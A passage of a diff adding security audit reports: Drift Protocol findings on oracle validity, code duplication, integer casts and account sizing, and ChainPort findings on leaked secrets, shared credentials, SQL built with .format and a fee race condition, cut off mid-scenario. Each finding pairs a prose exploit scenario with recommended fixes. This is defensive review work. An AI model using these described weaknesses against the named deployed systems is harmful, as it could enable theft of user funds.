programs/drift/src/instructions/user.rs#L687–L690 _ pub fn handle_place_spot_order (ctx: Context , params: OrderParams ) -> Result <()> { Figure 13.4: programs/drift/src/instructions/user.rs#L1022–L1023 Exploit Scenario Mallory tricks an administrator into making a call that re-enables an expiring spot market. Mallory profits by trading against the should-be-expired spot market. Recommendations Short term, add the missing access controls to the spot market functions in admin.rs . This will ensure that an administrator cannot accidentally perform an operation on an expired spot market. Long term, add tests to verify that each function involving spot markets fails when invoked on an expired spot market. This will increase confidence that the access controls have been implemented correctly. +14. Oracles can be invalid in at most one way Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-DRIFT-14 Target: programs/drift/src/math/oracle.rs Description The Drift Protocol codebase represents oracle validity using an enum , which does not allow an oracle to be invalid in more than one way. Furthermore, the code that determines an oracle’s validity imposes an implicit hierarchy on the ways an oracle could be invalid. This design is fragile and likely to cause future problems. The OracleValidity enum is shown in figure 14.1, and the code that determines an oracle’s validity is shown in figure 14.2. Note that if an oracle is, for example, both “too volatile” and “too uncertain,” the oracle will be labeled simply TooVolatile . A caller that does not account for this fact and simply checks whether an oracle is TooUncertain could overlook oracles that are both “too volatile” and “too uncertain.” pub enum OracleValidity { Invalid, TooVolatile, TooUncertain, StaleForMargin, InsufficientDataPoints, StaleForAMM, Valid, } Figure 14.1: programs/drift/src/math/oracle.rs#L21–L29 pub fn oracle_validity ( last_oracle_twap: i64 , oracle_price_data: & OraclePriceData , valid_oracle_guard_rails: & ValidityGuardRails , ) -> DriftResult { ... let oracle_validity = if is_oracle_price_nonpositive { OracleValidity::Invalid } else if is_oracle_price_too_volatile { OracleValidity::TooVolatile } else if is_conf_too_large { OracleValidity::TooUncertain } else if is_stale_for_margin { OracleValidity::StaleForMargin } else if !has_sufficient_number_of_data_points { OracleValidity::InsufficientDataPoints } else if is_stale_for_amm { OracleValidity::StaleForAMM } else { OracleValidity::Valid }; Ok (oracle_validity) } Figure 14.2: programs/drift/src/math/oracle.rs#L163–L230 Exploit Scenario Alice, a Drift Protocol developer, is unaware of the implicit hierarchy among the OracleValidity variants. Alice writes code like oracle_validity != OracleValidity::TooUncertain and unknowingly introduces a bug into the codebase. Recommendations Short term, represent oracle validity as a set of flags. This will allow oracles to be invalid in more than one way, which will result in more robust and maintainable code. Long term, thoroughly test all code that relies on oracle validity. This will help ensure the code’s correctness following the aforementioned change. +15. Code duplication Severity: Informational Difficulty: High Type: Patching Finding ID: TOB-DRIFT-15 Target: Various files in programs/drift Description Various files in the programs/drift directory contain duplicate code, which can lead to incomplete fixes or inconsistent behavior (e.g., because the code is modified in one location but not all). As an example, the code in figure 15.1 appears nearly verbatim in the functions liquidate_perp , liquidate_spot , liquidate_borrow_for_perp_pnl , and liquidate_perp_pnl_for_deposit . // check if user exited liquidation territory let (intermediate_total_collateral, intermediate_margin_requirement_with_buffer) = if !canceled_order_ids.is_empty() || lp_shares > 0 { ... // 37 lines ( intermediate_total_collateral, intermediate_margin_requirement_plus_buffer, ) } else { (total_collateral, margin_requirement_plus_buffer) }; Figure 15.1: programs/drift/src/controller/liquidation.rs#L201–L246 In some places, the text itself is not obviously duplicated, but the logic it implements is clearly duplicated. An example appears in figures 15.2 and 15.3. Such “logical” code duplication suggests the code does not use the right abstractions. // Update Market open interest if let PositionUpdateType::Open = update_type { if position.quote_asset_amount == 0 && position.base_asset_amount == 0 { market.number_of_users = market.number_of_users.safe_add( 1 )?; } market.number_of_users_with_base = market.number_of_users_with_base.safe_add( 1 )?; } else if let PositionUpdateType::Close = update_type { if new_base_asset_amount == 0 && new_quote_asset_amount == 0 { market.number_of_users = market.number_of_users.safe_sub( 1 )?; } market.number_of_users_with_base = market.number_of_users_with_base.safe_sub( 1 )?; } Figure 15.2: programs/drift/src/controller/position.rs#L162–L175 if position.quote_asset_amount == 0 && position.base_asset_amount == 0 { market.number_of_users = market.number_of_users.safe_add( 1 )?; } position.quote_asset_amount = position.quote_asset_amount.safe_add(delta)?; market.amm.quote_asset_amount = market.amm.quote_asset_amount.safe_add(delta.cast()?)?; if position.quote_asset_amount == 0 && position.base_asset_amount == 0 { market.number_of_users = market.number_of_users.safe_sub( 1 )?; } Figure 15.3: programs/drift/src/controller/position.rs#L537–L547 Exploit Scenario Alice, a Drift Protocol developer, is asked to fix a bug in liquidate_perp . Alice does not realize that the bug also applies to liquidate_spot , liquidate_borrow_for_perp_pnl , and liquidate_perp_pnl_for_deposit , and fixes the bug in only liquidate_perp . Eve discovers that the bug is not fixed in one of the other three functions and exploits it. Recommendations Short term: ● ● Refactor liquidate_perp , liquidate_spot , liquidate_borrow_for_perp_pnl , and liquidate_perp_pnl_for_deposit to eliminate the code duplication. This will reduce the likelihood of an incomplete fix for a bug affecting more than one of these functions. Identify cases where the code uses the same logic, and implement abstractions to capture that logic. Ensure that code that relies on such logic uses the new abstractions. Consolidating similar pieces of code will make the overall codebase easier to reason about. Long term, adopt code practices that discourage code duplication. This will help to prevent this problem from recurring. +16. Inconsistent use of integer types Severity: Informational Difficulty: High Type: Undefined Behavior Finding ID: TOB-DRIFT-16 Target: Various files in programs/drift Description The Drift Protocol codebase uses integer types inconsistently; data of similar kinds is represented using differently sized types or types with different signedness. Conversions from one integer type to another present an opportunity for the contracts to fail and should be avoided. For example, the pow method expects a u32 argument. However, in some places u128 values must be cast to u32 values, even though those values are intended to be used as exponents (figures 16.1, 16.2, and 16.3). let expo_diff = (spot_market.insurance_fund.shares_base - insurance_fund_stake.if_base) . cast::< u32 >() ?; let rebase_divisor = 10_ u128 .pow(expo_diff); Figure 16.1: programs/drift/src/controller/insurance.rs#L154–L157 #[zero_copy] #[derive(Default, Eq, PartialEq, Debug)] #[repr(C)] pub struct InsuranceFund { pub vault: Pubkey , pub total_shares: u128 , pub user_shares: u128 , pub shares_base: u128 , pub unstaking_period: i64 , // if_unstaking_period pub last_revenue_settle_ts: i64 , pub revenue_settle_period: i64 , pub total_factor: u32 , // percentage of interest for total insurance pub user_factor: u32 , // percentage of interest for user staked insurance // exponent for lp shares (for rebasing) } Figure 16.2: programs/drift/src/state/spot_market.rs#L352–L365 #[account(zero_copy)] #[derive(Default, Eq, PartialEq, Debug)] #[repr(C)] pub struct InsuranceFundStake { pub authority: Pubkey , if_shares: u128 , pub last_withdraw_request_shares: u128 , // get zero as 0 when not in escrow pub if_base: u128 , // exponent for if_shares decimal places (for rebase) pub last_valid_ts: i64 , pub last_withdraw_request_value: u64 , pub last_withdraw_request_ts: i64 , pub cost_basis: i64 , pub market_index: u16 , pub padding: [ u8 ; 14 ], } Figure 16.3: programs/drift/src/state/insurance_fund_stake.rs#L10–L24 The following command reveals 689 locations where the cast method appears to be used: grep -r -I '\.cast\>' programs/drift Each such use could lead to a denial of service if an attacker puts the contract into a state where the cast always errors. Many of these uses could be eliminated by more consistent use of integer types. Note that Drift Protocol has indicated that some of the observed inconsistencies are related to reducing rent costs. Exploit Scenario Mallory manages to put the contract into a state such that one of the nearly 700 uses of cast always returns an error. The contract becomes unusable for Alice, who needs to execute a code path involving the vulnerable cast . Recommendations Short term, review all uses of cast to see which might be eliminated by changing the types of the operands. This will reduce the overall number of cast s and reduce the likelihood that one could lead to denial of service. Long term, as new code is introduced into the codebase, review the types used to hold similar kinds of data. This will reduce the likelihood that new cast s are needed. +17. Use of opaque constants in tests Severity: Informational Difficulty: High Type: Testing Finding ID: TOB-DRIFT-17 Target: programs/drift/src/controller/liquidation/tests.rs Description Several of the Drift Protocol tests use constants with no explanation for how they were derived, which makes it difficult to assess whether the tests are functioning correctly. Ten examples appear in figure 17.1. In each case, a variable or field is compared against a constant consisting of 6–12 random-looking digits. Without an explanation for how these digits were obtained, it is difficult to tell whether the constant expresses the correct value. assert_eq! (user.spot_positions[ 0 ].scaled_balance, 45558159000 ); assert_eq! (user.spot_positions[ 1 ].scaled_balance, 406768999 ); ... assert_eq! (margin_requirement, 44744590 ); assert_eq! (total_collateral, 45558159 ); assert_eq! (margin_requirement_plus_buffer, 45558128 ); ... assert_eq! (token_amount, 406769 ); assert_eq! (token_value, 40676900 ); assert_eq! (strict_token_value_1, 4067690 ); // if oracle price is more favorable than twap ... assert_eq! (liquidator.spot_positions[ 0 ].scaled_balance, 159441841000 ); ... assert_eq! (liquidator.spot_positions[ 1 ].scaled_balance, 593824001 ); Figure 17.1: programs/drift/src/controller/liquidation/tests.rs#L1618–L1687 Exploit Scenario Mallory discovers that a constant used in a Drift Protocol test was incorrectly derived and that the tests were actually verifying incorrect behavior. Mallory uses the bug to siphon funds from the Drift Protocol exchange. Recommendations Short term, where possible, compute values using an explicit formula rather than an opaque constant. If using an explicit formula is not possible, include a comment explaining how the constant was derived. This will help to ensure that correct behavior is being tested for. Moreover, the process of giving such explicit formulas could reveal errors. Long term, write scripts to identify constants with high entropy, and run those scripts as part of your CI process. This will help to ensure the aforementioned standards are maintained. +18. Accounts from contexts are not always used by the instruction Severity: Informational Difficulty: High Type: Access Controls Finding ID: TOB-DRIFT-18 Target: programs/drift/src/instructions/admin.rs Description The context definition for the initialize instruction defines a drift_signer account. However, this account is not used by the instruction. It appears to be a remnant used to pass the address of the state PDA account; however, the need to do this was eliminated by the use of find_program_address to calculate the address. Also, in the initialize_insurance_fund_stake instruction, the spot_market , user_stats , and state accounts from the context are not used by the instruction. #[derive(Accounts)] pub struct Initialize <'info> { #[account(mut)] pub admin: Signer <'info>, #[account( init, seeds = [b "drift_state" .as_ref()], space = std::mem::size_of::() + 8, bump, payer = admin )] pub state: Box >, pub quote_asset_mint: Box >, /// CHECK: checked in `initialize` pub drift_signer: AccountInfo <'info>, pub rent: Sysvar <'info, Rent>, pub system_program: Program <'info, System>, pub token_program: Program <'info, Token>, } Figure 18.1: programs/drift/src/instructions/admin.rs#L1989–L2007 Exploit Scenario Alice, a Drift Protocol developer, assumes that the drift_signer account is used by the instruction, and she uses a different address for the account, expecting this account to hold the contract state after the initialize instruction has been called. Recommendations Short term, remove the unused account from the context. This eliminates the possibility of confusion around the use of the accounts. Long term, employ a process where a refactoring of an instruction’s code is followed by a review of the corresponding context definition. This ensures that the context is in sync with the instruction handlers. +19. Unaligned references are allowed Severity: Informational Difficulty: High Type: Undefined Behavior Finding ID: TOB-DRIFT-19 Target: programs/drift/src/lib.rs Description The Drift Protocol codebase uses the #![allow(unaligned_references)] attribute. This allows the use of unaligned references throughout the program and could mask serious problems in future updates to the contract. #![allow(clippy::too_many_arguments)] #![allow(unaligned_references)] #![allow(clippy::bool_assert_comparison)] #![allow(clippy::comparison_chain)] Figure 19.1: programs/drift/src/lib.rs#L1–L4 Exploit Scenario Alice, a Drift Protocol developer, accidentally introduces errors caused by the use of unaligned references, affecting the contract operation and leading to a loss of funds. Recommendations Short term, remove the attributes. This ensures that the check for unaligned references correctly flag such cases. Long term, be conservative with the use of attributes used to suppress warnings or errors throughout the codebase. If possible, apply them to only the minimum possible amount of code. This minimizes the risk of problems stemming from the suppressed checks. +20. Size of created accounts derived from in-memory representation Severity: Informational Difficulty: High Type: Configuration Finding ID: TOB-DRIFT-20 Target: Files in /programs/drift/src/state/ Description When state accounts are initialized, the size of the account is set to std::mem::size_of::() + 8 , where the eight extra bytes are used for the discriminator. The structs for the state types all have a trailing field with padding, seemingly to ensure the account size is aligned to eight bytes and to determine the size of the account. In other places, the code relies on the size_of function to determine the type of accounts passed to the instruction. While we could not find any security-related problem with the scheme today, this does mean that every account’s in-memory representation is inflated by the amount of padding, which could become a problem with respect to the limitation of the stack or heap size. Furthermore, if any of the accounts are updated in such a way that the repr(C) layout size differs from the Anchor space reference , it could cause a problem. For example, if the SpotMarket struct is changed so that its in-memory representation is smaller than the required Anchor size, the initialize_spot_market would fail because the created account would be too small to hold the serialized representation of the data. #[account] #[derive(Default)] #[repr(C)] pub struct State { pub admin: Pubkey , pub whitelist_mint: Pubkey , pub discount_mint: Pubkey , pub signer: Pubkey , pub srm_vault: Pubkey , pub perp_fee_structure: FeeStructure , pub spot_fee_structure: FeeStructure , pub oracle_guard_rails: OracleGuardRails , pub number_of_authorities: u64 , pub number_of_sub_accounts: u64 , pub lp_cooldown_time: u64 , pub liquidation_margin_buffer_ratio: u32 , pub settlement_duration: u16 , pub number_of_markets: u16 , pub number_of_spot_markets: u16 , pub signer_nonce: u8 , pub min_perp_auction_duration: u8 , pub default_market_order_time_in_force: u8 , pub default_spot_auction_duration: u8 , pub exchange_status: ExchangeStatus , pub padding : [ u8 ; 17 ], } Figure 20.1: The State struct, with corresponding padding #[account( init, seeds = [b "drift_state" .as_ref()], space = std::mem::size_of::() + 8 , bump, payer = admin )] pub state: Box >, Figure 20.2: The creation of the State account, using the in-memory size if data.len() < std::mem::size_of::() + 8 { return Ok (( None , None )); } Figure 20.3: An example of the in-memory size used to determine the account type Exploit Scenario Alice, a Drift Protocol developer, unaware of the implicit requirements of the in-memory size, makes changes to a state account’s structure or adds a state structure account such that the in-memory size is smaller than the size needed for the serialized data. As a result, instructions in the contract that save data to the account will fail. Recommendations Short term, add an implementation to each state struct that returns the size to be used for the corresponding Solana account. This avoids the overhead of the padding and removes the dependency on assumption about the in-memory size. Long term, avoid using assumptions about in-memory representation of type within programs created in Rust. This ensures that changes to the representation do not affect the program's operation. diff --git a/findings_newupdate/2023-01-keda-securityreview.txt b/findings_newupdate/tob/2023-01-keda-securityreview.txt similarity index 100% rename from findings_newupdate/2023-01-keda-securityreview.txt rename to findings_newupdate/tob/2023-01-keda-securityreview.txt diff --git a/findings_newupdate/2023-01-ryanshea-noblecurveslibrary-securityreview.txt b/findings_newupdate/tob/2023-01-ryanshea-noblecurveslibrary-securityreview.txt similarity index 100% rename from findings_newupdate/2023-01-ryanshea-noblecurveslibrary-securityreview.txt rename to findings_newupdate/tob/2023-01-ryanshea-noblecurveslibrary-securityreview.txt diff --git a/findings_newupdate/tob/2023-02-chainport-securityreview.txt b/findings_newupdate/tob/2023-02-chainport-securityreview.txt new file mode 100644 index 0000000..b8cfd1d --- /dev/null +++ b/findings_newupdate/tob/2023-02-chainport-securityreview.txt @@ -0,0 +1,21 @@ +1. Several secrets checked into source control Severity: Medium Difficulty: High Type: Data Exposure Finding ID: TOB-CHPT-1 Target: The chainport-backend repository Description The chainport-backend repository contains several secrets that are checked into source control. Secrets that are stored in source control are accessible to anyone who has had access to the repository (e.g., former employees or attackers who have managed to gain access to the repository). We used TruffleHog to identify these secrets (by running the command trufflehog git file://. in the root directory of the repository). TruffleHog found several types of credentials, including the following, which were verified through TruffleHog’s credential verification checks: ● GitHub personal access tokens ● Slack access tokens TruffleHog also found unverified GitLab authentication tokens and Polygon API credentials. Furthermore, we found hard-coded credentials, such as database credentials, in the source code, as shown in figure 1.1. [REDACTED] Figure 1.1: chainport-backend/env.prod.json#L3-L4 Exploit Scenario An attacker obtains a copy of the source code from a former DcentraLab employee. The attacker extracts the secrets from it and uses them to exploit DcentraLab’s database and insert events in the database that did not occur. Consequently, ChainPort’s AWS lambdas process the fake events and allow the attacker to steal funds. Recommendations Short term, remove credentials from source control and rotate them. Run TruffleHog by invoking the trufflehog git file://. command; if it identifies any unverified credentials, check whether they need to be addressed. Long term, consider using a secret management solution such as Vault to store secrets. 2. Same credentials used for staging, test, and production environment databases Severity: Low Difficulty: High Type: Configuration Finding ID: TOB-CHPT-2 Target: Database authentication Description The staging, test, and production environments' databases have the same username and password credentials. Exploit Scenario An attacker is able to obtain the password for the test environment’s database, which is less tightly secured than that of the production environment. He tries the same credentials on the production database and gains access to the database’s contents as well as the ability to write to it. He inserts fake events into the database. ChainPort’s AWS lambdas process the fake events and allow the attacker to steal funds. Recommendations Short term, rotate the current credentials and safely generate different credentials for each environment. This will prevent attackers who have compromised credentials for one environment from accessing other environments. Long term, use a secret management solution such as Vault to store the database credentials instead of relying on configuration files stored in the source code. 3. Use of error-prone pattern for logging functions Severity: Low Difficulty: High Type: Auditing and Logging Finding ID: TOB-CHPT-3 Target: The chainport-backend repository Description The pattern shown in figure 3.1 is used repeatedly throughout the codebase to log function names. [REDACTED] Figure 3.1: An example of the pattern used by ChainPort to log function names This pattern is prone to copy-and-paste errors. Developers may copy the code from one function to another but forget to change the function name, as exemplified in figure 3.2. [REDACTED] Figure 3.2: An example of an incorrect use of the pattern used by ChainPort to log function names We wrote a Semgrep rule to detect these problems (appendix D). This rule detected 46 errors associated with this pattern in the back-end application. Figure 3.3 shows an example of one of these findings. [REDACTED] Figure 3.3: An example of one of the 46 errors resulting from the function-name logging pattern (chainport-backend/modules/web_3/helpers.py#L313-L315) Exploit Scenario A ChainPort developer is auditing the back-end application logs to determine the root cause of a bug. Because an incorrect function name was logged, the developer cannot correctly trace the application’s flow and determine the root cause in a timely manner. Recommendations Short term, use the Python decorator in figure 3.4 to log function names. This will eliminate the risk of copy-and-paste errors. [REDACTED] Figure 3.4: A Python decorator that logs function names, eliminating the risk of copy-and-paste errors Long term, review the codebase for other error-prone patterns. If such patterns are found, rewrite the code in a way that eliminates or reduces the risk of errors, and write a Semgrep rule to find the errors before the code hits production. 4. Use of hard-coded strings instead of constants Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-CHPT-4 Target: The chainport-backend repository Description The back-end code uses several hard-coded strings that could be defined as constants to prevent any typos from introducing vulnerabilities. For example, the checks that determine the system’s environment compare the result of the get_env function with the strings “develop”, “staging”, “prod”, or “local”. Figure 4.1 shows an example of one of these checks. [REDACTED] Figure 4.1: chainport-backend/project/lambdas/mainchain/rebalance_monitor.py#L42-L43 We did not find any typos in these literal strings, so we set the severity of this finding to informational. However, the use of hard-coded strings in place of constants is not best practice; we suggest fixing this issue and following other best practices for writing safe code to prevent the introduction of bugs in the future. Exploit Scenario A ChainPort developer creates code that should run only in the development build and safeguards it with the check in figure 4.2. [REDACTED] Figure 4.2: An example of a check against a hard-coded string that could lead to a vulnerability This test always fails—the correct value to test should have been “develop”. Now, the poorly tested, experimental code that was meant to run only in development mode is deployed in production. Recommendations Short term, create a constant for each of the four possible environments. Then, to check the system’s environment, import the corresponding constant and use it in the comparison instead of the hard-coded string. Alternatively, use an enum instead of a string to perform these comparisons. Long term, review the code for other instances of hard-coded strings where constants could be used instead. Create Semgrep rules to ensure that developers never use hard-coded strings where constants are available. 5. Use of incorrect operator in SQLAlchemy filter Severity: Undetermined Difficulty: Undetermined Type: Undefined Behavior Finding ID: TOB-CHPT-5 Target: chainport-backend/project/data/db/port.py#L173 Description The back-end code uses the is not operator in an SQLAlchemy query’s filter. SQLAlchemy relies on the __eq__ family of methods to apply the filter; however, the is and is not operators do not trigger these methods. Therefore, only the comparison operators (== or !=) should be used. [REDACTED] Figure 5.1: chainport-backend/project/data/db/port.py#L173 We did not review whether this flaw could be used to bypass the system’s business logic, so we set the severity of this issue to undetermined. Exploit Scenario An attacker exploits this flawed check to bypass the system’s business logic and steal user funds. Recommendations Short term, replace the is not operator with != in the filter indicated above. Long term, to continuously monitor the codebase for reintroductions of this issue, run the python.sqlalchemy.correctness.bad-operator-in-filter.bad-operator-in-f ilter Semgrep rule as part of the CI/CD flow. References ● SQLAlchemy: Common Filter Operators ● Stack Overflow: Select NULL Values in SQLAlchemy 6. Several functions receive the wrong number of arguments Severity: Undetermined Difficulty: Undetermined Type: Undefined Behavior Finding ID: TOB-CHPT-6 Target: The chainport-backend repository Description Several functions in the chainport-backend repository are called with an incorrect number of arguments: ● Several functions in the /project/deprecated_files folder ● A call to release_tokens_by_maintainer from the rebalance_bridge function (figures 6.1 and 6.2) ● A call to generate_redeem_signature from the regenerate_signature function (figures 6.3 and 6.4) ● A call to get_next_nonce_for_public_address from the prepare_erc20_transfer_transaction function (figures 6.5 and 6.6) ● A call to get_cg_token_address_list from the main function of the file (likely old debugging code) [REDACTED] Figure 6.1: The release_tokens_by_maintainer function is called with four arguments, but at least five are required. (chainport-backend/project/lambdas/mainchain/rebalance_monitor.py#L109-L1 14) [REDACTED] Figure 6.2: The definition of the release_tokens_by_maintainer function (chainport-backend/project/lambdas/release_tokens_by_maintainer.py#L27-L3 4) [REDACTED] Figure 6.3: A call to generate_redeem_signature that is missing the network_id argument (chainport-backend/project/scripts/keys_maintainers_signature/regenerate_ signature.py#L38-L43) [REDACTED] Figure 6.4: The definition of the generate_redeem_signature function (chainport-backend/project/lambdas/sidechain/events_handlers/handle_burn_ event.py#L46-L48) [REDACTED] Figure 6.5: A call to get_next_nonce_for_public_address that is missing the outer_session argument (chainport-backend/project/web3_cp/erc20/prepare_erc20_transfer_transacti on.py#L32-L34) [REDACTED] Figure 6.6: The definition of the get_next_nonce_for_public_address function (chainport-backend/project/web3_cp/nonce.py#L19-L21) [REDACTED] Figure 6.7: A call to get_cg_token_address_list that is missing all three arguments (chainport-backend/project/lambdas/token_endpoints/cg_list_get.py#L90-91) [REDACTED] Figure 6.8: The definition of the get_cg_token_address_list function (chainport-backend/project/lambdas/token_endpoints/cg_list_get.py#L37) We did not review whether this flaw could be used to bypass the system’s business logic, so we set the severity of this issue to undetermined. Exploit Scenario The release_tokens_by_maintainer function is called from the rebalance_bridge function with the incorrect number of arguments. As a result, the rebalance_bridge function fails if the token balance is over the threshold limit, and the tokens are not moved to a safe address. An attacker finds another flaw and is able to steal more tokens than he would have been able to if the tokens were safely stored in another account. Recommendations Short term, fix the errors presented in the description of this finding by adding the missing arguments to the function calls. Long term, run pylint or a similar static analysis tool to detect these problems (and others) before the code is committed and deployed in production. This will ensure that if the list of a function’s arguments ever changes (which was likely the root cause of this problem), a call that does not match the new arguments will be flagged before the code is deployed. 7. Lack of events for critical operations Severity: Informational Difficulty: High Type: Auditing and Logging Finding ID: TOB-CHPT-7 Target: ChainportMainBridge.sol, ChainportSideBridge.sol, Validator.sol, Description Several critical operations do not trigger events. As a result, it will be difficult to review the correct behavior of the contracts once they have been deployed. For example, the setSignatoryAddress function, which is called in the Validator contract to set the signatory address, does not emit an event providing confirmation of that operation to the contract’s caller (figure 7.1). [REDACTED] Figure 7.1: The setSignatoryAddress function in Validator:43-52 Without events, users and blockchain-monitoring systems cannot easily detect suspicious behavior. Exploit Scenario Eve, an attacker, is able to compromise a quorum of the ChainPort congress voters contract. She then sets a new signatory address. Alice, a ChainPort team member, is unaware of the change and does not raise a security incident. Recommendations Short term, add events for all critical operations that result in state changes. Events aid in contract monitoring and the detection of suspicious behavior. Long term, consider using a blockchain-monitoring system to track any suspicious behavior in the contracts. The system relies on several contracts to behave as expected. A monitoring mechanism for critical events would quickly detect any compromised system components. 8. Lack of zero address checks in setter functions Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-CHPT-8 Target: ChainportMainBridge.sol, ChainportMiddleware.sol, ChainportSideBridge.sol Description Certain setter functions fail to validate incoming arguments, so callers can accidentally set important state variables to the zero address. For example, in the initialize function of the ChainportMainBridge contract, developers can define the maintainer registry, the congress address for governance, and the signature validator and set their addresses to the zero address. [REDACTED] Figure 8.1: The initialize function of ChainportMainBridge.sol Failure to immediately reset an address that has been set to the zero address could result in unexpected behavior. Exploit Scenario Alice accidentally sets the ChainPort congress address to the zero address when initializing a new version of the ChainportMainBridge contract. The misconfiguration causes the system to behave unexpectedly, and the system must be redeployed once the misconfiguration is detected. Recommendations Short term, add zero-value checks to all constructor functions and for all setter arguments to ensure that users cannot accidentally set incorrect values, misconfiguring the system. Document any arguments that are intended to be set to the zero address, highlighting the expected values of those arguments on each chain. Long term, use the Slither static analyzer to catch common issues such as this one. Consider integrating a Slither scan into the project’s CI pipeline, pre-commit hooks, or build scripts. 9. Python type annotations are missing from most functions Severity: Low Difficulty: High Type: Undefined Behavior Finding ID: TOB-CHPT-9 Target: The chainport-backend repository Description The back-end code uses Python type annotations; however, their use is sporadic, and most functions are missing them. Exploit Scenario The cg_rest_call function receives the exception argument without specifying its type with a Python type annotation. The get_token_details_by_cg_id function calls cg_rest_call with an object of the incorrect type, an Exception instance instead of an Exception class, causing the program to crash (figure 9.1). [REDACTED] Figure 9.1: chainport-backend/modules/coingecko/api.py#L41-L42 Recommendations Short term, add type annotations to the arguments of every function. This will not prevent the code from crashing or causing undefined behavior during runtime; however, it will allow developers to clearly see each argument’s expected type and static analyzers to better detect type mismatches. Long term, implement checks in the CI/CD pipeline to ensure that code without type annotations is not accepted. 10. Use of libraries with known vulnerabilities Severity: Low Difficulty: Low Type: Patching Finding ID: TOB-CHPT-10 Target: The chainport-backend repository Description The back-end repository uses outdated libraries with known vulnerabilities. We used pip-audit, a tool developed by with support from Google to audit Python environments and dependency trees for known vulnerabilities, and identified two known vulnerabilities in the project’s dependencies (as shown in figure 10.1). [REDACTED] Figure 10.1: A list of outdated libraries in the back-end repository Recommendations Short term, update the project’s dependencies to their latest versions wherever possible. Use pip-audit to confirm that no vulnerable dependencies remain. Long term, add pip-audit to the project’s CI/CD pipeline. Do not allow builds to succeed with dependencies that have known vulnerabilities. 11. Use of JavaScript instead of TypeScript Severity: Low Difficulty: Low Type: Configuration Finding ID: TOB-CHPT-11 Target: The chainport-app repository Description The ChainPort front end is developed with JavaScript instead of TypeScript. TypeScript is a strongly typed language that compiles to JavaScript. It allows developers to specify the types of variables and function arguments, and TypeScript code will fail to compile if there are type mismatches. Contrarily, JavaScript code will crash (or worse) during runtime if there are type mismatches. In summary, TypeScript is preferred over JavaScript for the following reasons: ● It improves code readability; developers can easily identify variable types and the types that functions receive. ● It improves security by providing static type checking that catches errors during compilation. ● It improves support for integrated development environments (IDEs) and other tools by allowing them to reason about the types of variables. Exploit Scenario A bug in the front-end application is missed, and the code is deployed in production. The bug causes the application to crash, preventing users from using it. This bug would have been caught if the front-end application were written in TypeScript. Recommendations Short term, rewrite newer parts of the application in TypeScript. TypeScript can be used side-by-side with JavaScript in the same application, allowing it to be introduced gradually. Long term, gradually rewrite the whole application in TypeScript. 12. Use of .format to create SQL queries Severity: Informational Difficulty: Medium Type: Data Validation Finding ID: TOB-CHPT-12 Target: [REDACTED] Description The back end builds SQL queries with the .format function. An attacker that controls one of the variables that the function is formatting will be able to inject SQL code to steal information or damage the database. [REDACTED] Figure 12.1: chainport-backend/project/data/db/postgres.py#L4-L24 [REDACTED] Figure 12.2: chainport-backend/project/lambdas/database_monitor/clear_lock.py#L29-L31 None of the fields described above are attacker-controlled, so we set the severity of this finding to informational. However, the use of .format to create SQL queries is an anti-pattern; parameterized queries should be used instead. Exploit Scenario A developer copies the vulnerable code to create a new SQL query. This query receives an attacker-controlled string. The attacker conducts a time-based SQL injection attack, leaking the whole database. Recommendations Short term, use parameterized queries instead of building strings with variables by hand. Long term, create or use a static analysis check that forbids this pattern. This will ensure that this pattern is never reintroduced by a less security-aware developer. 13. Many rules are disabled in the ESLint configuration Severity: Informational Difficulty: High Type: Testing Finding ID: TOB-CHPT-13 Target: chainport-app/.eslintrc.js Description There are 34 rules disabled in the front-end eslint configuration. Disabling some of these rules does not cause problems, but disabling others reduces the code’s security and reliability (e.g., react/no-unescaped-entities, consistent-return, no-shadow) and the code’s readability (e.g., react/jsx-boolean-value, react/jsx-one-expression-per-line). Furthermore, the code contains 46 inline eslint-disable comments to disable specific rules. While disabling some of these rules in this way may be valid, we recommend adding a comment to each instance explaining why the specific rule was disabled. Recommendations Short term, create a list of rules that can be safely disabled without reducing the code’s security or readability, document the justification, and enable every other rule. Fix any findings that these rules may report. For rules that are disabled with inline eslint-disable comments, include explanatory comments justifying why they are disabled. 14. Congress can lose quorum after manually setting the quorum value Severity: Medium Difficulty: High Type: Configuration Finding ID: TOB-CHPT-14 Target: contracts/governance/ChainportCongressMembersRegistry.sol Description Proposals to the ChainPort congress must be approved by a minimum quorum of members before they can be executed. By default, when a new member is added to the congress, the quorum is updated to be N − 1, where N is the number of congress members. [REDACTED] Figure 14.1: smart-contracts/contracts/governance/ChainportCongressMembersRegistry.so l#L98-L119 However, the congress has the ability to overwrite the quorum number to any nonzero number, including values larger than the current membership. [REDACTED] Figure 14.2: smart-contracts//contracts/governance/ChainportCongressMembersRegistry.s ol#L69-L77 If the congress manually lowers the quorum number and later adds a member, the quorum number will be reset to one less than the total membership. If for some reason certain members are temporarily or permanently unavailable (e.g., they are on vacation or their private keys were destroyed), the minimum quorum would not be reached. Exploit Scenario The ChainPort congress is composed of 10 members. Alice submits a proposal to reduce the minimum quorum to six members to ensure continuity while several members take vacations over a period of several months. During this period, a proposal to add Bob as a new member of the ChainPort congress is passed while Carol and Dave, two other congress members, are on vacation. This unexpectedly resets the minimum quorum to 10 members of the 11-person congress, preventing new proposals from being passed. Recommendations Short term, rewrite the code so that, when a new member is added to the congress, the minimum quorum number increases by one rather than being updated to the current number of congress members subtracted by one. Add a cap to the minimum quorum number to prevent it from being manually set to values larger than the current membership of the congress. Long term, uncouple operations for increasing and decreasing quorum values from operations for making congress membership changes. Instead, require that such operations be included as additional actions in proposals for membership changes. 15. Potential race condition could allow users to bypass PORTX fee payments Severity: Low Type: Timing Difficulty: Medium Finding ID: TOB-CHPT-15 Target: contracts/ChainportFeeManager.sol Description ChainPort fees are paid either as a 0.3% fee deducted from the amount transferred or as a 0.2% fee in PORTX tokens that the user has deposited into the ChainportFeeManager contract. To determine whether a fee should be paid in the base token or in PORTX, the back end checks whether the user has a sufficient PORTX balance in the ChainportFeeManager contract. [REDACTED] Figure 15.1: chainport-backend//project/lambdas/fees/fees.py#L219-249 However, the ChainportFeeManager contract does not enforce an unbonding period, a period of time before users can unstake their PORTX tokens. [REDACTED] Figure 15.2: smart-contracts/contracts/ChainportFeeManager.sol#L113-L125 Since pending fee payments are generated as part of deposit, transfer, and burn events but the actual processing is handled by a separate monitor, it could be possible for a user to withdraw her PORTX tokens on-chain after the deposit event has been processed and before the fee payment transaction is confirmed, allowing her to avoid paying a fee for the transfer. Exploit Scenario Alice uses ChainPort to bridge one million USDC from the Ethereum mainnet to Polygon. She has enough PORTX deposited in the ChainportFeeManager contract to 